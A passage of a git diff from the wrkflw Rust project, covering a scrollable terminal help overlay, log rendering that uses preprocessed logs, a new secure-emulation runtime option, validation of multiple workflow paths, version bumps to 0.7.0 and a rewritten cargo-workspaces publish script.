|
||||
Line::from(Span::styled(
|
||||
"💡 TIPS",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("emulation mode", Style::default().fg(Color::Red)),
|
||||
Span::raw(" when containers"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" are unavailable or for quick testing")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Secure emulation", Style::default().fg(Color::Yellow)),
|
||||
Span::raw(" provides sandboxing"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for untrusted workflows")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• Use "),
|
||||
Span::styled("validation mode", Style::default().fg(Color::Green)),
|
||||
Span::raw(" to check"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" workflows without execution")]),
|
||||
Line::from(""),
|
||||
Line::from(vec![
|
||||
Span::raw("• "),
|
||||
Span::styled("Preserve containers", Style::default().fg(Color::Blue)),
|
||||
Span::raw(" on failure"),
|
||||
]),
|
||||
Line::from(vec![Span::raw(" for debugging (Docker/Podman only)")]),
|
||||
];
|
||||
|
||||
// Apply scroll offset to the content
|
||||
let left_help_text = if scroll_offset < left_help_text.len() {
|
||||
left_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
let right_help_text = if scroll_offset < right_help_text.len() {
|
||||
right_help_text.into_iter().skip(scroll_offset).collect()
|
||||
} else {
|
||||
vec![Line::from("")]
|
||||
};
|
||||
|
||||
// Render left column
|
||||
let left_widget = Paragraph::new(left_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(" Help ", Style::default().fg(Color::Yellow))),
|
||||
.title(Span::styled(
|
||||
" WRKFLW Help - Controls & Features ",
|
||||
Style::default()
|
||||
.fg(Color::Yellow)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
f.render_widget(help_widget, area);
|
||||
// Render right column
|
||||
let right_widget = Paragraph::new(right_help_text)
|
||||
.block(
|
||||
Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Rounded)
|
||||
.title(Span::styled(
|
||||
" Interface Guide & Tips ",
|
||||
Style::default()
|
||||
.fg(Color::Cyan)
|
||||
.add_modifier(Modifier::BOLD),
|
||||
)),
|
||||
)
|
||||
.wrap(Wrap { trim: true });
|
||||
|
||||
f.render_widget(left_widget, chunks[0]);
|
||||
f.render_widget(right_widget, chunks[1]);
|
||||
}
|
||||
|
||||
// Render a help overlay
|
||||
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
|
||||
pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>, scroll_offset: usize) {
|
||||
let size = f.size();
|
||||
|
||||
// Create a slightly smaller centered modal
|
||||
let width = size.width.min(60);
|
||||
let height = size.height.min(20);
|
||||
// Create a larger centered modal to accommodate comprehensive help content
|
||||
let width = (size.width * 9 / 10).min(120); // Use 90% of width, max 120 chars
|
||||
let height = (size.height * 9 / 10).min(40); // Use 90% of height, max 40 lines
|
||||
let x = (size.width - width) / 2;
|
||||
let y = (size.height - height) / 2;
|
||||
|
||||
@@ -60,10 +427,32 @@ pub fn render_help_overlay(f: &mut Frame<CrosstermBackend<io::Stdout>>) {
|
||||
height,
|
||||
};
|
||||
|
||||
// Create a clear background
|
||||
// Create a semi-transparent dark background for better visibility
|
||||
let clear = Block::default().style(Style::default().bg(Color::Black));
|
||||
f.render_widget(clear, size);
|
||||
|
||||
// Render the help content
|
||||
render_help_tab(f, help_area);
|
||||
// Add a border around the entire overlay for better visual separation
|
||||
let overlay_block = Block::default()
|
||||
.borders(Borders::ALL)
|
||||
.border_type(BorderType::Double)
|
||||
.style(Style::default().bg(Color::Black).fg(Color::White))
|
||||
.title(Span::styled(
|
||||
" Press ? or Esc to close help ",
|
||||
Style::default()
|
||||
.fg(Color::Gray)
|
||||
.add_modifier(Modifier::ITALIC),
|
||||
));
|
||||
|
||||
f.render_widget(overlay_block, help_area);
|
||||
|
||||
// Create inner area for content
|
||||
let inner_area = Rect {
|
||||
x: help_area.x + 1,
|
||||
y: help_area.y + 1,
|
||||
width: help_area.width.saturating_sub(2),
|
||||
height: help_area.height.saturating_sub(2),
|
||||
};
|
||||
|
||||
// Render the help content with scroll support
|
||||
render_help_content(f, inner_area, scroll_offset);
|
||||
}
|
||||
|
||||
@@ -140,45 +140,8 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
|
||||
f.render_widget(search_block, chunks[1]);
|
||||
}
|
||||
|
||||
// Combine application logs with system logs
|
||||
let mut all_logs = Vec::new();
|
||||
|
||||
// Now all logs should have timestamps in the format [HH:MM:SS]
|
||||
|
||||
// Process app logs
|
||||
for log in &app.logs {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Process system logs
|
||||
for log in wrkflw_logging::get_logs() {
|
||||
all_logs.push(log.clone());
|
||||
}
|
||||
|
||||
// Filter logs based on search query and filter level
|
||||
let filtered_logs = if !app.log_search_query.is_empty() || app.log_filter_level.is_some() {
|
||||
all_logs
|
||||
.iter()
|
||||
.filter(|log| {
|
||||
let passes_filter = match &app.log_filter_level {
|
||||
None => true,
|
||||
Some(level) => level.matches(log),
|
||||
};
|
||||
|
||||
let matches_search = if app.log_search_query.is_empty() {
|
||||
true
|
||||
} else {
|
||||
log.to_lowercase()
|
||||
.contains(&app.log_search_query.to_lowercase())
|
||||
};
|
||||
|
||||
passes_filter && matches_search
|
||||
})
|
||||
.cloned()
|
||||
.collect::<Vec<String>>()
|
||||
} else {
|
||||
all_logs.clone() // Clone to avoid moving all_logs
|
||||
};
|
||||
// Use processed logs from background thread instead of processing on every frame
|
||||
let filtered_logs = &app.processed_logs;
|
||||
|
||||
// Create a table for logs for better organization
|
||||
let header_cells = ["Time", "Type", "Message"]
|
||||
@@ -189,109 +152,10 @@ pub fn render_logs_tab(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App, a
|
||||
.style(Style::default().add_modifier(Modifier::BOLD))
|
||||
.height(1);
|
||||
|
||||
let rows = filtered_logs.iter().map(|log_line| {
|
||||
// Parse log line to extract timestamp, type and message
|
||||
|
||||
// Extract timestamp from log format [HH:MM:SS]
|
||||
let timestamp = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let end = log_line.find(']').unwrap_or(0);
|
||||
if end > 1 {
|
||||
log_line[1..end].to_string()
|
||||
} else {
|
||||
"??:??:??".to_string() // Show placeholder for malformed logs
|
||||
}
|
||||
} else {
|
||||
"??:??:??".to_string() // Show placeholder for malformed logs
|
||||
};
|
||||
|
||||
let (log_type, log_style, _) =
|
||||
if log_line.contains("Error") || log_line.contains("error") || log_line.contains("❌")
|
||||
{
|
||||
("ERROR", Style::default().fg(Color::Red), log_line.as_str())
|
||||
} else if log_line.contains("Warning")
|
||||
|| log_line.contains("warning")
|
||||
|| log_line.contains("⚠️")
|
||||
{
|
||||
(
|
||||
"WARN",
|
||||
Style::default().fg(Color::Yellow),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else if log_line.contains("Success")
|
||||
|| log_line.contains("success")
|
||||
|| log_line.contains("✅")
|
||||
{
|
||||
(
|
||||
"SUCCESS",
|
||||
Style::default().fg(Color::Green),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else if log_line.contains("Running")
|
||||
|| log_line.contains("running")
|
||||
|| log_line.contains("⟳")
|
||||
{
|
||||
("INFO", Style::default().fg(Color::Cyan), log_line.as_str())
|
||||
} else if log_line.contains("Triggering") || log_line.contains("triggered") {
|
||||
(
|
||||
"TRIG",
|
||||
Style::default().fg(Color::Magenta),
|
||||
log_line.as_str(),
|
||||
)
|
||||
} else {
|
||||
("INFO", Style::default().fg(Color::Gray), log_line.as_str())
|
||||
};
|
||||
|
||||
// Extract content after timestamp
|
||||
let content = if log_line.starts_with('[') && log_line.contains(']') {
|
||||
let start = log_line.find(']').unwrap_or(0) + 1;
|
||||
log_line[start..].trim()
|
||||
} else {
|
||||
log_line.as_str()
|
||||
};
|
||||
|
||||
// Highlight search matches in content if search is active
|
||||
let mut content_spans = Vec::new();
|
||||
if !app.log_search_query.is_empty() {
|
||||
let lowercase_content = content.to_lowercase();
|
||||
let lowercase_query = app.log_search_query.to_lowercase();
|
||||
|
||||
if lowercase_content.contains(&lowercase_query) {
|
||||
let mut last_idx = 0;
|
||||
while let Some(idx) = lowercase_content[last_idx..].find(&lowercase_query) {
|
||||
let real_idx = last_idx + idx;
|
||||
|
||||
// Add text before match
|
||||
if real_idx > last_idx {
|
||||
content_spans.push(Span::raw(content[last_idx..real_idx].to_string()));
|
||||
}
|
||||
|
||||
// Add matched text with highlight
|
||||
let match_end = real_idx + app.log_search_query.len();
|
||||
content_spans.push(Span::styled(
|
||||
content[real_idx..match_end].to_string(),
|
||||
Style::default().bg(Color::Yellow).fg(Color::Black),
|
||||
));
|
||||
|
||||
last_idx = match_end;
|
||||
}
|
||||
|
||||
// Add remaining text after last match
|
||||
if last_idx < content.len() {
|
||||
content_spans.push(Span::raw(content[last_idx..].to_string()));
|
||||
}
|
||||
} else {
|
||||
content_spans.push(Span::raw(content));
|
||||
}
|
||||
} else {
|
||||
content_spans.push(Span::raw(content));
|
||||
}
|
||||
|
||||
Row::new(vec![
|
||||
Cell::from(timestamp),
|
||||
Cell::from(log_type).style(log_style),
|
||||
Cell::from(Line::from(content_spans)),
|
||||
])
|
||||
});
|
||||
// Convert processed logs to table rows - this is now very fast since logs are pre-processed
|
||||
let rows = filtered_logs
|
||||
.iter()
|
||||
.map(|processed_log| processed_log.to_row());
|
||||
|
||||
let content_idx = if show_search_bar { 2 } else { 1 };
|
||||
|
||||
|
||||
@@ -15,7 +15,7 @@ use std::io;
|
||||
pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
|
||||
// Check if help should be shown as an overlay
|
||||
if app.show_help {
|
||||
help_overlay::render_help_overlay(f);
|
||||
help_overlay::render_help_overlay(f, app.help_scroll);
|
||||
return;
|
||||
}
|
||||
|
||||
@@ -48,7 +48,7 @@ pub fn render_ui(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &mut App) {
|
||||
}
|
||||
}
|
||||
2 => logs_tab::render_logs_tab(f, app, main_chunks[1]),
|
||||
3 => help_overlay::render_help_tab(f, main_chunks[1]),
|
||||
3 => help_overlay::render_help_content(f, main_chunks[1], app.help_scroll),
|
||||
_ => {}
|
||||
}
|
||||
|
||||
|
||||
@@ -41,7 +41,8 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
.bg(match app.runtime_type {
|
||||
RuntimeType::Docker => Color::Blue,
|
||||
RuntimeType::Podman => Color::Cyan,
|
||||
RuntimeType::Emulation => Color::Magenta,
|
||||
RuntimeType::SecureEmulation => Color::Green,
|
||||
RuntimeType::Emulation => Color::Red,
|
||||
})
|
||||
.fg(Color::White),
|
||||
));
|
||||
@@ -108,6 +109,12 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
.fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::SecureEmulation => {
|
||||
status_items.push(Span::styled(
|
||||
" 🔒SECURE ",
|
||||
Style::default().bg(Color::Green).fg(Color::White),
|
||||
));
|
||||
}
|
||||
RuntimeType::Emulation => {
|
||||
// No need to check anything for emulation mode
|
||||
}
|
||||
@@ -174,7 +181,7 @@ pub fn render_status_bar(f: &mut Frame<CrosstermBackend<io::Stdout>>, app: &App,
|
||||
"[No logs to display]"
|
||||
}
|
||||
}
|
||||
3 => "[?] Toggle help overlay",
|
||||
3 => "[↑/↓] Scroll help [?] Toggle help overlay",
|
||||
_ => "",
|
||||
};
|
||||
status_items.push(Span::styled(
|
||||
|
||||
@@ -12,7 +12,7 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
|
||||
@@ -12,8 +12,8 @@ categories.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Internal crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
serde.workspace = true
|
||||
|
||||
@@ -12,18 +12,18 @@ license.workspace = true
|
||||
|
||||
[dependencies]
|
||||
# Workspace crates
|
||||
wrkflw-models = { path = "../models", version = "0.6.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.6.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.6.0" }
|
||||
wrkflw-gitlab = { path = "../gitlab", version = "0.6.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.6.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.6.0" }
|
||||
wrkflw-parser = { path = "../parser", version = "0.6.0" }
|
||||
wrkflw-runtime = { path = "../runtime", version = "0.6.0" }
|
||||
wrkflw-ui = { path = "../ui", version = "0.6.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.6.0" }
|
||||
wrkflw-validators = { path = "../validators", version = "0.6.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.6.0" }
|
||||
wrkflw-models = { path = "../models", version = "0.7.0" }
|
||||
wrkflw-executor = { path = "../executor", version = "0.7.0" }
|
||||
wrkflw-github = { path = "../github", version = "0.7.0" }
|
||||
wrkflw-gitlab = { path = "../gitlab", version = "0.7.0" }
|
||||
wrkflw-logging = { path = "../logging", version = "0.7.0" }
|
||||
wrkflw-matrix = { path = "../matrix", version = "0.7.0" }
|
||||
wrkflw-parser = { path = "../parser", version = "0.7.0" }
|
||||
wrkflw-runtime = { path = "../runtime", version = "0.7.0" }
|
||||
wrkflw-ui = { path = "../ui", version = "0.7.0" }
|
||||
wrkflw-utils = { path = "../utils", version = "0.7.0" }
|
||||
wrkflw-validators = { path = "../validators", version = "0.7.0" }
|
||||
wrkflw-evaluator = { path = "../evaluator", version = "0.7.0" }
|
||||
|
||||
# External dependencies
|
||||
clap.workspace = true
|
||||
@@ -62,4 +62,4 @@ path = "src/lib.rs"
|
||||
|
||||
[[bin]]
|
||||
name = "wrkflw"
|
||||
path = "src/main.rs"
|
||||
path = "src/main.rs"
|
||||
|
||||
@@ -26,6 +26,9 @@ wrkflw validate
|
||||
wrkflw validate .github/workflows/ci.yml
|
||||
wrkflw validate path/to/workflows
|
||||
|
||||
# Validate multiple files and/or directories
|
||||
wrkflw validate path/to/flow-1.yml path/to/flow-2.yml path/to/workflows
|
||||
|
||||
# Run a workflow (Docker by default)
|
||||
wrkflw run .github/workflows/ci.yml
|
||||
|
||||
@@ -40,10 +43,11 @@ wrkflw tui --runtime podman
|
||||
|
||||
### Commands
|
||||
|
||||
- **validate**: Validate a workflow/pipeline file or directory
|
||||
- **validate**: Validate workflow/pipeline files and/or directories
|
||||
- GitHub (default): `.github/workflows/*.yml`
|
||||
- GitLab: `.gitlab-ci.yml` or files ending with `gitlab-ci.yml`
|
||||
- Exit code behavior (by default): `1` when validation failures are detected
|
||||
- Accepts multiple paths in a single invocation
|
||||
- Exit code behavior (by default): `1` when any validation failure is detected
|
||||
- Flags: `--gitlab`, `--exit-code`, `--no-exit-code`, `--verbose`
|
||||
|
||||
- **run**: Execute a workflow or pipeline locally
|
||||
|
||||
@@ -10,8 +10,10 @@ enum RuntimeChoice {
|
||||
Docker,
|
||||
/// Use Podman containers for isolation
|
||||
Podman,
|
||||
/// Use process emulation mode (no containers)
|
||||
/// Use process emulation mode (no containers, UNSAFE)
|
||||
Emulation,
|
||||
/// Use secure emulation mode with sandboxing (recommended for untrusted code)
|
||||
SecureEmulation,
|
||||
}
|
||||
|
||||
impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
|
||||
@@ -20,6 +22,7 @@ impl From<RuntimeChoice> for wrkflw_executor::RuntimeType {
|
||||
RuntimeChoice::Docker => wrkflw_executor::RuntimeType::Docker,
|
||||
RuntimeChoice::Podman => wrkflw_executor::RuntimeType::Podman,
|
||||
RuntimeChoice::Emulation => wrkflw_executor::RuntimeType::Emulation,
|
||||
RuntimeChoice::SecureEmulation => wrkflw_executor::RuntimeType::SecureEmulation,
|
||||
}
|
||||
}
|
||||
}
|
||||
@@ -48,8 +51,9 @@ struct Wrkflw {
|
||||
enum Commands {
|
||||
/// Validate workflow or pipeline files
|
||||
Validate {
|
||||
/// Path to workflow/pipeline file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
/// Path(s) to workflow/pipeline file(s) or directory(ies) (defaults to .github/workflows if none provided)
|
||||
#[arg(value_name = "path", num_args = 0..)]
|
||||
paths: Vec<PathBuf>,
|
||||
|
||||
/// Explicitly validate as GitLab CI/CD pipeline
|
||||
#[arg(long)]
|
||||
@@ -69,7 +73,7 @@ enum Commands {
|
||||
/// Path to workflow/pipeline file to execute
|
||||
path: PathBuf,
|
||||
|
||||
/// Container runtime to use (docker, podman, emulation)
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
@@ -91,7 +95,7 @@ enum Commands {
|
||||
/// Path to workflow file or directory (defaults to .github/workflows)
|
||||
path: Option<PathBuf>,
|
||||
|
||||
/// Container runtime to use (docker, podman, emulation)
|
||||
/// Container runtime to use (docker, podman, emulation, secure-emulation)
|
||||
#[arg(short, long, value_enum, default_value = "docker")]
|
||||
runtime: RuntimeChoice,
|
||||
|
||||
@@ -266,6 +270,28 @@ fn is_gitlab_pipeline(path: &Path) -> bool {
|
||||
|
||||
#[tokio::main]
|
||||
async fn main() {
|
||||
// Gracefully handle Broken pipe (EPIPE) when output is piped (e.g., to `head`)
|
||||
let default_panic_hook = std::panic::take_hook();
|
||||
std::panic::set_hook(Box::new(move |info| {
|
||||
let mut is_broken_pipe = false;
|
||||
if let Some(s) = info.payload().downcast_ref::<&str>() {
|
||||
if s.contains("Broken pipe") {
|
||||
is_broken_pipe = true;
|
||||
}
|
||||
}
|
||||
if let Some(s) = info.payload().downcast_ref::<String>() {
|
||||
if s.contains("Broken pipe") {
|
||||
is_broken_pipe = true;
|
||||
}
|
||||
}
|
||||
if is_broken_pipe {
|
||||
// Treat as a successful, short-circuited exit
|
||||
std::process::exit(0);
|
||||
}
|
||||
// Fallback to the default hook for all other panics
|
||||
default_panic_hook(info);
|
||||
}));
|
||||
|
||||
let cli = Wrkflw::parse();
|
||||
let verbose = cli.verbose;
|
||||
let debug = cli.debug;
|
||||
@@ -286,65 +312,78 @@ async fn main() {
|
||||
|
||||
match &cli.command {
|
||||
Some(Commands::Validate {
|
||||
path,
|
||||
paths,
|
||||
gitlab,
|
||||
exit_code,
|
||||
no_exit_code,
|
||||
}) => {
|
||||
// Determine the path to validate
|
||||
let validate_path = path
|
||||
.clone()
|
||||
.unwrap_or_else(|| PathBuf::from(".github/workflows"));
|
||||
|
||||
// Check if the path exists
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
std::process::exit(1);
|
||||
}
|
||||
// Determine the paths to validate (default to .github/workflows when none provided)
|
||||
let validate_paths: Vec<PathBuf> = if paths.is_empty() {
|
||||
vec![PathBuf::from(".github/workflows")]
|
||||
} else {
|
||||
paths.clone()
|
||||
};
|
||||
|
||||
// Determine if we're validating a GitLab pipeline based on the --gitlab flag or file detection
|
||||
let force_gitlab = *gitlab;
|
||||
let mut validation_failed = false;
|
||||
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
for validate_path in validate_paths {
|
||||
// Check if the path exists; if not, mark failure but continue
|
||||
if !validate_path.exists() {
|
||||
eprintln!("Error: Path does not exist: {}", validate_path.display());
|
||||
validation_failed = true;
|
||||
continue;
|
||||
}
|
||||
|
||||
println!("Validating {} workflow file(s)...", entries.len());
|
||||
if validate_path.is_dir() {
|
||||
// Validate all workflow files in the directory
|
||||
let entries = std::fs::read_dir(&validate_path)
|
||||
.expect("Failed to read directory")
|
||||
.filter_map(|entry| entry.ok())
|
||||
.filter(|entry| {
|
||||
entry.path().is_file()
|
||||
&& entry
|
||||
.path()
|
||||
.extension()
|
||||
.is_some_and(|ext| ext == "yml" || ext == "yaml")
|
||||
})
|
||||
.collect::<Vec<_>>();
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
println!(
|
||||
"Validating {} workflow file(s) in {}...",
|
||||
entries.len(),
|
||||
validate_path.display()
|
||||
);
|
||||
|
||||
for entry in entries {
|
||||
let path = entry.path();
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
let file_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&path, verbose)
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&path, verbose)
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
|
||||
if file_failed {
|
||||
validation_failed = true;
|
||||
}
|
||||
}
|
||||
} else {
|
||||
// Validate a single workflow file
|
||||
let is_gitlab = force_gitlab || is_gitlab_pipeline(&validate_path);
|
||||
|
||||
validation_failed = if is_gitlab {
|
||||
validate_gitlab_pipeline(&validate_path, verbose)
|
||||
} else {
|
||||
validate_github_workflow(&validate_path, verbose)
|
||||
};
|
||||
}
|
||||
|
||||
// Set exit code if validation failed and exit_code flag is true (and no_exit_code is false)
|
||||
|
||||
@@ -1,71 +1,179 @@
|
||||
#!/bin/bash
|
||||
|
||||
# Simple script to publish all wrkflw crates to crates.io in dependency order
|
||||
# Enhanced script to manage versions and publish all wrkflw crates using cargo-workspaces
|
||||
|
||||
set -e
|
||||
|
||||
DRY_RUN=${1:-""}
|
||||
# Parse command line arguments
|
||||
COMMAND=${1:-""}
|
||||
VERSION_TYPE=${2:-""}
|
||||
DRY_RUN=""
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Testing wrkflw crates publication"
|
||||
else
|
||||
echo "🚀 Publishing wrkflw crates to crates.io"
|
||||
fi
|
||||
show_help() {
|
||||
echo "Usage: $0 <command> [options]"
|
||||
echo ""
|
||||
echo "Commands:"
|
||||
echo " version <type> Update versions across workspace"
|
||||
echo " Types: patch, minor, major"
|
||||
echo " publish Publish all crates to crates.io"
|
||||
echo " release <type> Update versions and publish (combines version + publish)"
|
||||
echo " help Show this help message"
|
||||
echo ""
|
||||
echo "Options:"
|
||||
echo " --dry-run Test without making changes (for publish/release)"
|
||||
echo ""
|
||||
echo "Examples:"
|
||||
echo " $0 version minor # Bump to 0.7.0"
|
||||
echo " $0 publish --dry-run # Test publishing"
|
||||
echo " $0 release minor --dry-run # Test version bump + publish"
|
||||
echo " $0 release patch # Release patch version"
|
||||
}
|
||||
|
||||
# Check if we're logged in to crates.io
|
||||
if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
|
||||
echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
|
||||
exit 1
|
||||
fi
|
||||
|
||||
# Publication order (respecting dependencies)
|
||||
CRATES=(
|
||||
"models"
|
||||
"logging"
|
||||
"utils"
|
||||
"matrix"
|
||||
"validators"
|
||||
"github"
|
||||
"gitlab"
|
||||
"parser"
|
||||
"runtime"
|
||||
"evaluator"
|
||||
"executor"
|
||||
"ui"
|
||||
"wrkflw"
|
||||
)
|
||||
|
||||
echo "📦 Publishing crates in dependency order..."
|
||||
|
||||
for crate in "${CRATES[@]}"; do
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "Testing $crate..."
|
||||
cd "crates/$crate"
|
||||
cargo publish --dry-run --allow-dirty
|
||||
echo "✅ $crate dry-run successful"
|
||||
else
|
||||
echo "Publishing $crate..."
|
||||
cd "crates/$crate"
|
||||
cargo publish --allow-dirty
|
||||
echo "✅ Published $crate"
|
||||
fi
|
||||
cd - > /dev/null
|
||||
|
||||
# Small delay to avoid rate limiting (except for the last crate and in dry-run)
|
||||
if [[ "$crate" != "wrkflw" ]] && [[ "$DRY_RUN" != "--dry-run" ]]; then
|
||||
echo " Waiting 10 seconds to avoid rate limits..."
|
||||
sleep 10
|
||||
# Parse dry-run flag from any position
|
||||
for arg in "$@"; do
|
||||
if [[ "$arg" == "--dry-run" ]]; then
|
||||
DRY_RUN="--dry-run"
|
||||
fi
|
||||
done
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🎉 All crates passed dry-run tests!"
|
||||
echo ""
|
||||
echo "To actually publish, run:"
|
||||
echo " ./publish_crates.sh"
|
||||
else
|
||||
echo "🎉 All crates published successfully!"
|
||||
echo ""
|
||||
echo "Users can now install wrkflw with:"
|
||||
echo " cargo install wrkflw"
|
||||
case "$COMMAND" in
|
||||
"help"|"-h"|"--help"|"")
|
||||
show_help
|
||||
exit 0
|
||||
;;
|
||||
"version")
|
||||
if [[ -z "$VERSION_TYPE" ]]; then
|
||||
echo "❌ Error: Version type required (patch, minor, major)"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
"publish")
|
||||
# publish command doesn't need version type
|
||||
;;
|
||||
"release")
|
||||
if [[ -z "$VERSION_TYPE" ]]; then
|
||||
echo "❌ Error: Version type required for release (patch, minor, major)"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
fi
|
||||
;;
|
||||
*)
|
||||
echo "❌ Error: Unknown command '$COMMAND'"
|
||||
echo ""
|
||||
show_help
|
||||
exit 1
|
||||
;;
|
||||
esac
|
||||
|
||||
# Check if cargo-workspaces is installed
|
||||
if ! command -v cargo-workspaces &> /dev/null; then
|
||||
echo "❌ cargo-workspaces not found. Installing..."
|
||||
cargo install cargo-workspaces
|
||||
fi
|
||||
|
||||
# Check if we're logged in to crates.io (only for publish operations)
|
||||
if [[ "$COMMAND" == "publish" ]] || [[ "$COMMAND" == "release" ]]; then
|
||||
if [ ! -f ~/.cargo/credentials.toml ] && [ ! -f ~/.cargo/credentials ]; then
|
||||
echo "❌ Not logged in to crates.io. Please run: cargo login <your-token>"
|
||||
exit 1
|
||||
fi
|
||||
fi
|
||||
|
||||
# Function to update versions
|
||||
update_versions() {
|
||||
local version_type=$1
|
||||
echo "🔄 Updating workspace versions ($version_type)..."
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Simulating version update"
|
||||
echo ""
|
||||
echo "Current workspace version: $(grep '^version =' Cargo.toml | cut -d'"' -f2)"
|
||||
echo "Would execute: cargo workspaces version $version_type"
|
||||
echo ""
|
||||
echo "This would update all crates and their internal dependencies."
|
||||
echo "✅ Version update simulation completed (no changes made)"
|
||||
else
|
||||
cargo workspaces version "$version_type"
|
||||
echo "✅ Versions updated successfully"
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to test build
|
||||
test_build() {
|
||||
echo "🔨 Testing workspace build..."
|
||||
if cargo build --workspace; then
|
||||
echo "✅ Workspace builds successfully"
|
||||
else
|
||||
echo "❌ Build failed. Please fix errors before publishing."
|
||||
exit 1
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to publish crates
|
||||
publish_crates() {
|
||||
echo "📦 Publishing crates to crates.io..."
|
||||
|
||||
if [[ "$DRY_RUN" == "--dry-run" ]]; then
|
||||
echo "🧪 DRY RUN: Testing publication"
|
||||
cargo workspaces publish --dry-run
|
||||
echo "✅ All crates passed dry-run tests!"
|
||||
echo ""
|
||||
echo "To actually publish, run:"
|
||||
echo " $0 publish"
|
||||
else
|
||||
cargo workspaces publish
|
||||
echo "🎉 All crates published successfully!"
|
||||
echo ""
|
||||
echo "Users can now install wrkflw with:"
|
||||
echo " cargo install wrkflw"
|
||||
fi
|
||||
}
|
||||
|
||||
# Function to show changelog info
|
||||
show_changelog_info() {
|
||||
echo "📝 Changelog will be generated automatically by GitHub Actions workflow"
|
||||
}
|
||||
|
||||
# Execute commands based on the operation
|
||||
case "$COMMAND" in
|
||||
"version")
|
||||
update_versions "$VERSION_TYPE"
|
||||
show_changelog_info
|
||||
;;
|
||||
"publish")
|
||||
test_build
|
||||
